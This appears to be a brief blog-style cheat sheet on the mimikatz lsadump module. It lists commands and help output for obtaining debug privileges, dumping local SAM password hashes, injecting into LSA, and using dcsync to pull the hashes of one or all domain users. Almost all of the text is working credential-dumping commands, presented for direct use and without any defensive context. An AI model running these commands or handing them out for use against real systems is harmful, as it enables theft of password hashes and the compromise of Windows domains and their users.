mimikatz

OpenSource, mimikatz
2024-05-07

Overview: using and analyzing the mimikatz project

1. lsadump

Online reference manual: Mimikatz 🥝 | The Hacker Tools

1.1. Command help

```
lsadump::?
```

1.2. Getting local user hashes

```
# Elevate privileges
privilege::debug
# Read the SAM
lsadump::sam
# Retrieve using injection
lsadump::sam /inject
# View the help listing
mimikatz # lsadump::
ERROR mimikatz_doLocal ; "(null)" command of "lsadump" module not found !

Module :        lsadump
Full name :     LsaDump module

             sam  -  Get the SysKey to decrypt SAM entries (from registry or hives)
         secrets  -  Get the SysKey to decrypt SECRETS entries (from registry or hives)
           cache  -  Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives)
             lsa  -  Ask LSA Server to retrieve SAM/AD entries (normal, patch on the fly or inject)
           trust  -  Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly)
      backupkeys
          rpdata
          dcsync  -  Ask a DC to synchronize an object
        dcshadow  -  They told me I could be anything I wanted, so I became a domain controller
         setntlm  -  Ask a server to set a new password/ntlm for one user
      changentlm  -  Ask a server to set a new password/ntlm for one user
         netsync  -  Ask a DC to send current and previous NTLM hash of DC/SRV/WKS
        packages
             mbc
       zerologon
   postzerologon
```

1.3. Getting domain users

Reference article: "Several ways to export domain user hashes" (Tencent Cloud Developer Community)

```
# Elevate privileges
privilege::debug

# Obtain token privileges
token::elevate

# Perform the injection
lsadump::lsa /inject

# Retrieve the specified user via dcsync (asks a DC to synchronize the object)
lsadump::dcsync /user:username

# Retrieve the specified user using injection
lsadump::dcsync /user:username /inject

# Retrieve all users in the domain
lsadump::dcsync /domain:test.com /all /csv
```